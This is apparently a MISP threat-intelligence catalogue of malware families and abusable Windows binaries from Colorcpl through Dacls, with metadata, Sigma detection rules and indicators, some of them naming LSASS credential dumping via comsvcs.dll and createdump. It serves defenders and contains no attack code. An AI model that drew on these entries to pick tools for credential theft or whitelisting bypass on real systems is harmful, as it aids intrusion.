This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary that handles color management
Author: Arjan Onwezen
Paths: * C:\Windows\System32\colorcpl.exe * C:\Windows\SysWOW64\colorcpl.exe
Resources: * https://twitter.com/eral4m/status/1480468728324231172
Detection: * Sigma: file_event_win_susp_colorcpl.yml * IOC: colorcpl.exe writing files[Colorcpl.exe - LOLBAS Project]
Internal MISP references
UUID 9f006b88-2f13-4c99-ade0-839da70d1e11
which can be used as unique global reference for Colorcpl
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5092 |
source | Tidal Cyber |
tags | ['884eb1b1-aede-4db0-8443-ba50624682e1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Comnie
Comnie is a remote backdoor which has been used in attacks in East Asia. [Palo Alto Comnie]
Internal MISP references
UUID 341fc709-4908-4e41-8df3-554dae6d72b0
which can be used as unique global reference for Comnie
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0244 |
source | MITRE |
type | ['malware'] |
ComRAT
ComRAT is a second stage implant suspected of being a descendant of Agent.btz and used by Turla. The first version of ComRAT was identified in 2007, but the tool has undergone substantial development for many years since.[Symantec Waterbug][NorthSec 2015 GData Uroburos Tools][ESET ComRAT May 2020]
Internal MISP references
UUID 300c5997-a486-4a61-8213-93a180c22849
which can be used as unique global reference for ComRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0126 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Comsvcs
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: COM+ Services
Author: LOLBAS Team
Paths: * c:\windows\system32\comsvcs.dll
Resources: * https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
Detection: * Sigma: proc_creation_win_rundll32_process_dump_via_comsvcs.yml * Sigma: proc_access_win_lsass_dump_comsvcs_dll.yml * Elastic: credential_access_cmdline_dump_tool.toml * Splunk: dump_lsass_via_comsvcs_dll.yml[Comsvcs.dll - LOLBAS Project]
Internal MISP references
UUID 0448178d-fff1-4174-8339-e6bfca78fb84
which can be used as unique global reference for Comsvcs
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5202 |
source | Tidal Cyber |
tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '334b0ee4-5a0d-4634-91c8-236593b818a0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Conficker
Conficker is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.[SANS Conficker] In 2016, a variant of Conficker made its way on computers and removable disk drives belonging to a nuclear power plant.[Conficker Nuclear Power Plant]
Internal MISP references
UUID ef33f1fa-18a3-4b30-b359-17b7930f43a7
which can be used as unique global reference for Conficker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0608 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647'] |
type | ['malware'] |
ConfigSecurityPolicy
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: Ialle Teixeira
Paths: * C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
Resources: * https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads * https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads * https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor * https://twitter.com/NtSetDefault/status/1302589153570365440?s=20
Detection: * Sigma: proc_creation_win_lolbin_configsecuritypolicy.yml * IOC: ConfigSecurityPolicy storing data into alternate data streams. * IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. * IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"[ConfigSecurityPolicy.exe - LOLBAS Project]
Internal MISP references
UUID 0e178275-4eb7-4fae-a703-d9730adf6a26
which can be used as unique global reference for ConfigSecurityPolicy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5093 |
source | Tidal Cyber |
tags | ['d99039e1-e677-4226-8b63-e698d6642535', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Conhost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Console Window host
Author: Wietze Beukema
Paths: * c:\windows\system32\conhost.exe
Resources: * https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ * https://twitter.com/Wietze/status/1511397781159751680 * https://twitter.com/embee_research/status/1559410767564181504 * https://twitter.com/ankit_anubhav/status/1561683123816972288
Detection: * IOC: conhost.exe spawning unexpected processes * Sigma: proc_creation_win_conhost_susp_child_process.yml[Conhost.exe - LOLBAS Project]
Internal MISP references
UUID d3f8a214-3e65-4b7d-aed6-97a3e38ef8e0
which can be used as unique global reference for Conhost
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5094 |
source | Tidal Cyber |
tags | ['ea54037d-e07b-42b0-afe6-33576ec36f44', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ConnectWise
ConnectWise is a legitimate remote administration tool that has been used since at least 2016 by threat actors including MuddyWater and GOLD SOUTHFIELD to connect to and conduct lateral movement in target environments.[Anomali Static Kitten February 2021][Trend Micro Muddy Water March 2021]
Internal MISP references
UUID 6f9bb24d-cce2-49de-bedd-1849d9bde7a0
which can be used as unique global reference for ConnectWise
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0591 |
source | MITRE |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Conti
Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using Conti steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.[Cybereason Conti Jan 2021][CarbonBlack Conti July 2020][Cybleinc Conti January 2020]
Internal MISP references
UUID 8e995c29-2759-4aeb-9a0f-bb7cd97b06e5
which can be used as unique global reference for Conti
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0575 |
source | MITRE |
tags | ['89c5b94b-ecf4-4d53-9b74-3465086d4565', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '0ed7d10c-c65b-4174-9edb-446bf301d250', '3d90eed2-862d-4f61-8c8f-0b8da3e45af0', '12a2e20a-7c27-46bb-954d-b372833a9925', '1b98f09a-7d93-4abb-8f3e-1eacdb9f9871', 'c2380542-36f2-4922-9ed2-80ced06645c9', 'dea4388a-b1f2-4f2a-9df9-108631d0d078', '24448a05-2337-4bc9-a889-a83f2fd1f3ad', '2743d495-7728-4a75-9e5f-b64854039792', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Control
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used to launch controlpanel items in Windows
Author: Oddvar Moe
Paths: * C:\Windows\System32\control.exe * C:\Windows\SysWOW64\control.exe
Resources: * https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ * https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ * https://twitter.com/bohops/status/955659561008017409 * https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
Detection: * Sigma: proc_creation_win_exploit_cve_2021_40444.yml * Sigma: proc_creation_win_rundll32_susp_control_dll_load.yml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * Elastic: defense_evasion_execution_control_panel_suspicious_args.toml * Elastic: defense_evasion_unusual_dir_ads.toml * IOC: Control.exe executing files from alternate data streams * IOC: Control.exe executing library file without cpl extension * IOC: Suspicious network connections from control.exe[Control.exe - LOLBAS Project]
Internal MISP references
UUID efc46430-b27f-4b05-bc36-1d5eba685ec7
which can be used as unique global reference for Control
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5095 |
source | Tidal Cyber |
tags | ['53ac2b35-d302-4bdd-9931-5b6c6cb31b96', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CookieMiner
CookieMiner is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.[Unit42 CookieMiner Jan 2019]
Internal MISP references
UUID 6e2c4aef-2f69-4507-9ee3-55432d76341e
which can be used as unique global reference for CookieMiner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0492 |
source | MITRE |
type | ['malware'] |
CORALDECK
CORALDECK is an exfiltration tool used by APT37. [FireEye APT37 Feb 2018]
Internal MISP references
UUID f13c8455-d615-4f8d-9d9c-5b31e593cd8a
which can be used as unique global reference for CORALDECK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0212 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
coregen
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
Author: Martin Sohn Christensen
Paths: * C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe * C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
Resources: * https://www.youtube.com/watch?v=75XImxOOInU * https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Detection: * Sigma: image_load_side_load_coregen.yml * IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" * IOC: coregen.exe loading .dll file not named coreclr.dll * IOC: coregen.exe command line containing -L or -l * IOC: coregen.exe command line containing unexpected/invald assembly name * IOC: coregen.exe application crash by invalid assembly name[coregen.exe - LOLBAS Project]
Internal MISP references
UUID b7dacd5c-eaba-48db-bdd7-e779a82b2ba7
which can be used as unique global reference for coregen
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5209 |
source | Tidal Cyber |
tags | ['a19a158e-aec4-410a-8c3e-e9080b111183', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CORESHELL
CORESHELL is a downloader used by APT28. The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.[FireEye APT28] [FireEye APT28 January 2017]
Internal MISP references
UUID 3b193f62-2b49-4eff-bdf4-501fb8a28274
which can be used as unique global reference for CORESHELL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0137 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CosmicDuke
CosmicDuke is malware that was used by APT29 from 2010 to 2015. [F-Secure The Dukes]
Internal MISP references
UUID 43b317c6-5b4f-47b8-b7b4-15cd6f455091
which can be used as unique global reference for CosmicDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0050 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CostaBricks
CostaBricks is a loader that was used to deploy 32-bit backdoors in the CostaRicto campaign.[BlackBerry CostaRicto November 2020]
Internal MISP references
UUID ea9e2d19-89fe-4039-a1e0-467b14554c6f
which can be used as unique global reference for CostaBricks
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0614 |
source | MITRE |
type | ['malware'] |
CozyCar
CozyCar is malware that was used by APT29 from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. [F-Secure The Dukes]
Internal MISP references
UUID c2353daa-fd4c-44e1-8013-55400439965a
which can be used as unique global reference for CozyCar
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0046 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CrackMapExec
CrackMapExec, or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks.[CME Github September 2018]
Internal MISP references
UUID 47e710b4-1397-47cf-a979-20891192f313
which can be used as unique global reference for CrackMapExec
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0488 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Createdump
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
Author: mr.d0x, Daniel Santos
Paths: * C:\Program Files\dotnet\shared\Microsoft.NETCore.App*\createdump.exe * C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App*\createdump.exe * C:\Program Files\Microsoft Visual Studio*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe * C:\Program Files (x86)\Microsoft Visual Studio*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
Resources: * https://twitter.com/bopin2020/status/1366400799199272960 * https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps
Detection: * Sigma: proc_creation_win_proc_dump_createdump.yml * Sigma: proc_creation_win_renamed_createdump.yml * IOC: createdump.exe process with a command line containing the lsass.exe process id[Createdump.exe - LOLBAS Project]
Internal MISP references
UUID a574b315-523c-45c3-8743-feb3d541e81a
which can be used as unique global reference for Createdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5210 |
source | Tidal Cyber |
tags | ['7beee233-2b65-4593-88e6-a5c0c02c6a08', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CredoMap
CredoMap is a credential-stealing malware developed by the Russian espionage actor APT28. The malware harvests cookies and credentials from select web browsers and exfiltrates the information via the IMAP email protocol. CredoMap was observed being used in attack campaigns in Ukraine in 2022.[CERTFR-2023-CTI-009][SecurityScorecard CredoMap September 2022]
Internal MISP references
UUID 516ffd19-72b9-43a1-b866-bb075fdcb137
which can be used as unique global reference for CredoMap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5074 |
source | Tidal Cyber |
tags | ['904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CreepyDrive
CreepyDrive is a custom implant has been used by POLONIUM since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.[Microsoft POLONIUM June 2022]
POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.[Microsoft POLONIUM June 2022]
Internal MISP references
UUID 7f7f05c3-fbb1-475e-b672-2113709065c8
which can be used as unique global reference for CreepyDrive
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Office 365', 'Windows'] |
software_attack_id | S1023 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CreepySnail
CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.[Microsoft POLONIUM June 2022]
Internal MISP references
UUID 11ce380c-481b-4c9b-b44e-06f1a91c01c1
which can be used as unique global reference for CreepySnail
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1024 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Crimson
Crimson is a remote access Trojan that has been used by Transparent Tribe since at least 2016.[Proofpoint Operation Transparent Tribe March 2016][Kaspersky Transparent Tribe August 2020]
Internal MISP references
UUID 3b3f296f-20a6-459a-98c5-62ebdee3701f
which can be used as unique global reference for Crimson
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0115 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CrossRAT
CrossRAT is a cross platform RAT.
Internal MISP references
UUID 38811c3b-f548-43fa-ab26-c7243b84a055
which can be used as unique global reference for CrossRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0235 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Crutch
Crutch is a backdoor designed for document theft that has been used by Turla since at least 2015.[ESET Crutch December 2020]
Internal MISP references
UUID e1ad229b-d750-4148-a1f3-36e767b03cd1
which can be used as unique global reference for Crutch
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0538 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cryptoistic
Cryptoistic is a backdoor, written in Swift, that has been used by Lazarus Group.[SentinelOne Lazarus macOS July 2020]
Internal MISP references
UUID 12ce6d04-ebe5-440e-b342-0283b7c8a0c8
which can be used as unique global reference for Cryptoistic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0498 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Csc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary file used by .NET to compile C# code
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
Resources: * https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
Detection: * Sigma: proc_creation_win_csc_susp_parent.yml * Sigma: proc_creation_win_csc_susp_folder.yml * Elastic: defense_evasion_dotnet_compiler_parent_process.toml * Elastic: defense_evasion_execution_msbuild_started_unusal_process.toml * IOC: Csc.exe should normally not run as System account unless it is used for development.[Csc.exe - LOLBAS Project]
Internal MISP references
UUID 939eeb6b-3f74-43b6-8ead-644457ee7d78
which can be used as unique global reference for Csc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5096 |
source | Tidal Cyber |
tags | ['2ee25dd6-256c-4659-b1b6-f5afc943ccc1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Cscript
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used to execute scripts in Windows
Author: Oddvar Moe
Paths: * C:\Windows\System32\cscript.exe * C:\Windows\SysWOW64\cscript.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Detection: * Sigma: proc_creation_win_wscript_cscript_script_exec.yml * Sigma: file_event_win_net_cli_artefact.yml * Elastic: defense_evasion_unusual_dir_ads.toml * Elastic: command_and_control_remote_file_copy_scripts.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: wscript_or_cscript_suspicious_child_process.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Cscript.exe executing files from alternate data streams * IOC: DotNet CLR libraries loaded into cscript.exe * IOC: DotNet CLR Usage Log - cscript.exe.log[Cscript.exe - LOLBAS Project]
Internal MISP references
UUID 83036c61-d8cf-42f8-a9e5-dc3d26d75cdc
which can be used as unique global reference for Cscript
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5097 |
source | Tidal Cyber |
tags | ['7cae5f59-dbbf-406f-928d-118430d2bdd0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
csi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Command line interface included with Visual Studio.
Author: Oddvar Moe
Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe * c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
Resources: * https://twitter.com/subTee/status/781208810723549188 * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Detection: * Sigma: proc_creation_win_csi_execution.yml * Sigma: proc_creation_win_csi_use_of_csharp_console.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[csi.exe - LOLBAS Project]
Internal MISP references
UUID a11e4ebf-59e4-4b79-8a20-be1618dfbaed
which can be used as unique global reference for csi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5211 |
source | Tidal Cyber |
tags | ['86bb7f3c-652c-4f77-af2a-34677ff42315', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
CSPY Downloader
CSPY Downloader is a tool designed to evade analysis and download additional payloads used by Kimsuky.[Cybereason Kimsuky November 2020]
Internal MISP references
UUID eb481db6-d7ba-4873-a171-76a228c9eb97
which can be used as unique global reference for CSPY Downloader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0527 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Cuba
Cuba is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.[McAfee Cuba April 2021]
Internal MISP references
UUID 095064c6-144e-4935-b878-f82151bc08e4
which can be used as unique global reference for Cuba
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0625 |
source | MITRE |
tags | ['89c5b94b-ecf4-4d53-9b74-3465086d4565', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '4bc9ab8f-7f57-4b1a-8857-ffaa7e5cc930', '17864218-bc4f-4564-8abf-97c988eea9f7', 'b6458e46-650e-4e96-8e68-8a9d70bcf045', 'bac51672-8240-4182-9087-23626023e509', 'c5c8f954-1bc0-45d5-9a4f-4385d0a720a1', '2743d495-7728-4a75-9e5f-b64854039792', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
CustomShellHost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: A host process that is used by custom shells when using Windows in Kiosk mode.
Author: Wietze Beukema
Paths: * C:\Windows\System32\CustomShellHost.exe
Resources: * https://twitter.com/YoSignals/status/1381353520088113154 * https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher
Detection: * IOC: CustomShellHost.exe is unlikely to run on normal workstations * Sigma: proc_creation_win_lolbin_customshellhost.yml[CustomShellHost.exe - LOLBAS Project]
Internal MISP references
UUID 3ff0d4fc-6678-42f0-869b-f48906d98f82
which can be used as unique global reference for CustomShellHost
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5098 |
source | Tidal Cyber |
tags | ['536c3d51-9fc4-445e-9723-e11b69f0d6d5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Cyclops Blink
Cyclops Blink is a modular malware that has been used in widespread campaigns by Sandworm Team since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.[NCSC Cyclops Blink February 2022][NCSC CISA Cyclops Blink Advisory February 2022][Trend Micro Cyclops Blink March 2022]
Internal MISP references
UUID 68792756-7dbf-41fd-8d48-ac3cc2b52712
which can be used as unique global reference for Cyclops Blink
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S0687 |
source | MITRE |
tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dacls
Dacls is a multi-platform remote access tool used by Lazarus Group since at least December 2019.[TrendMicro macOS Dacls May 2020][SentinelOne Lazarus macOS July 2020]
Internal MISP references
UUID 9d521c18-09f0-47be-bfe5-e1bf26f7b928
which can be used as unique global reference for Dacls
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
